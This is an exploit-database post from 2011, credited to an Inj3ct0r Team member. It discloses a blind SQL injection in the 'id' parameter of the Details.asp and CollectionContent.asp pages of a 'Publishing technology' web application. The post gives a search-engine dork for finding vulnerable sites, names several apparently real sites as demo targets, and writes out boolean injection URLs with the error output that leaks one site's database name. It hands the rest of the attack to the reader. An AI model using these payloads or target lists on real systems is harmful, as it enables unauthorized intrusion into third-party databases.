Home / exploits Publishing Technology Blind SQL Injection
Posted on 25 April 2011
========================================================= Publishing technology <= BLIND SQL Injection Vulnerabilities =========================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KnocKout member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com [~] HomePage : http://h4x0resec.blogspot.com - http://griadamlar.com [~] Reference : http://h4x0resec.blogspot.com ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Publishing technology |~Price : N/A |~Version : N/A |~Software: www.publishingtechnology.com |~Vulnerability Style : SQL Injection |~Vulnerability Dir : / |~Google Keyword : "Powered by Publishing technology AS" |[~]Date : "24.04.2011" |[~]Tested on : Web Server: Microsoft-IIS/6.0 Powered-by: ASP.NET DB Server: MySQL >=5 ---------------------------------------------------------- Details.asp in 'id' Functions Not Security CollectionContent.asp 'id' Functions Not Security -- Demos. http://www.la4o.net/Details.asp?id=4 http://www.studiemotet.no/details.asp?id=120 http://www.lesliedowney.no/CollectionContent.asp?id=24 http://lesliedowney.no/CollectionContent.asp?id=24 ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============================================================== |{~~~~~~~~ Explotation| Blind SQL Injection~~~~~~~~~~~}| Example Mysql Version? SQL Injecting : http://www.lesliedowney.no/CollectionContent.asp?id=24 and substring(@@version,1,1)=4 {FALSE} SQL Injecting Retry : http://www.lesliedowney.no/CollectionContent.asp?id=24 and substring(@@version,1,1)=5 {TRUE} Database name? SQL Injecting : http://www.lesliedowney.no/CollectionContent.asp?id=24 and lenght((database()))<=6 and 'Inj3ct0r'='Inj3ct0r' Mysql Writes : [MySQL][ODBC 3.51 Driver][mysqld-5.0.17]FUNCTION leslie.lenght does not exist Database Name Found! : "leslie" the rest is up to you exploit. ================================================================ Got a present!! FOR EXPLOIT-DB Lamers.. ::):):):) ............../'' ) ...........,/¯../ ........../..../ .../´¯/'...'/´¯¯`•¸ ./'/.../..../......./¨¯ \n('(...´...´.... ¯~/'...' ) ..................'..... / ..''............. _.•´ ..................( ............. --------------------------------------------------------------------- .__ _____ _______ | |__ / | |___ __ _ \_______ ____ | | / | | / / /_ \_ __ \_/ __ \n| Y / ^ /> < \_/ | / ___/ |___| /\____ |/__/\_ \_____ /__| \___ > / |__| / / / _____________________________ / _____/\_ _____/\_ ___ \n\_____ | __)_ / / / | \ \____ /_______ //_______ / \______ / / / / & __ ____/___ __ \___ |_ / /___ / / /___ |___ __/___ / _ / __ __ /_/ /__ /| |__ / __ /_/ / __ /| |__ / __ / / /_/ / _ _, _/ _ ___ |_ / _ __ / _ ___ |_ / _ /__ \____/ /_/ |_| /_/ |_|/_/ /_/ /_/ /_/ |_|/_/ /____/ _____ __________ /_______ _________________ __ ___/_ __/_ __ `/__ ___/__ ___/ _(__ ) / /_ / /_/ / _ / _(__ ) /____/ \__/ \__,_/ /_/ /____/ KaCaK - MUS4LLAT - ameN - KnocKout - TechnicaL - Neuromancer - MahseN
